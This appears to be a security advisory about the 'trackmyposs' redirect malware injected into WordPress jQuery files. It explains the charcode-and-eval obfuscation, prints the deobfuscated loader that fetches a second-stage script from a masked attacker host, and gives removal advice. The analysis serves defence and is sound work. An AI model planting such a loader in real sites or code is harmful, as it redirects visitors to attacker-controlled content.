Recently there has been an increase in JavaScript malware, beginning with the marker /*trackmyposs*/, being embedded in WordPress core files.

What is the redirect hack in WordPress?

A redirect hack is a type of malware (malicious program) in which an attacker modifies files in a WordPress installation so that visitors are forced to another site.

The attacker gets in by exploiting a vulnerability in some program, such as a plugin, or by obtaining administrative privileges; with that access the site's files are rewritten and the malware is embedded.

Embedding JavaScript malware beginning with trackmyposs in core files

This malware inserts malicious code at the top of the following files shipped with WordPress:

/wp-includes/js/jquery/jquery.min.js
/wp-includes/js/jquery/jquery-migrate.min.js
or a JavaScript file with the same name bundled inside a theme or plugin.

The injected code begins like the following:

/*trackmyposs*/eval(String.fromCharCode( followed by a long comma-separated list of numbers (character codes)

String.fromCharCode turns that list of numbers back into the original JavaScript source text, and eval then executes it. The numbers are simply the character codes of the hidden program, so this obfuscation hides the code from casual inspection and from simple string searches, but it is fully reversible without running it.

jquery.min.js and jquery-migrate.min.js are loaded on practically every page of a WordPress site, so the injected code runs on each page view and visitors are forced to another site.

Unobfuscated, the code looks like the following (the host is masked as ******** here).

var d = document;
var s = d.createElement('script');
s.id = "trackmyposs";
// second stage is fetched from the attacker's host
s.src = "https://********/robots.js?v=3.1.3";
if (document.currentScript) {
    // insert right before the infected jquery file that is currently running
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    // fallback for browsers without document.currentScript
    d.getElementsByTagName('head')[0].appendChild(s);
}

The ******** part is the host that distributes the malicious second-stage file.

You can see that this code creates a script element, points it at the attacker's robots.js, and inserts it into the page: directly before the currently executing (infected) script where document.currentScript is available, otherwise into the HEAD. The redirect logic itself lives in that remotely loaded file, so the destination can be changed on the attacker's side without touching the infected site again, and the loader alone does not reveal where visitors end up.

Malware Detection and Removal

The free WordPress plugin Malware Scan & Security Plug-in [Malware and Virus Detection and Removal] will detect and remove the trackmyposs malware.

In addition, the presence of this malware means the attacker either obtained administrative privileges or exploited some other vulnerability, so other backdoors may also have been planted on the server.

Removing the injected lines from jquery.min.js alone is therefore not enough: it may be necessary to inspect all files on the server, compare the core files against a clean copy of the same WordPress version, remove any other malware, and close the original entry point.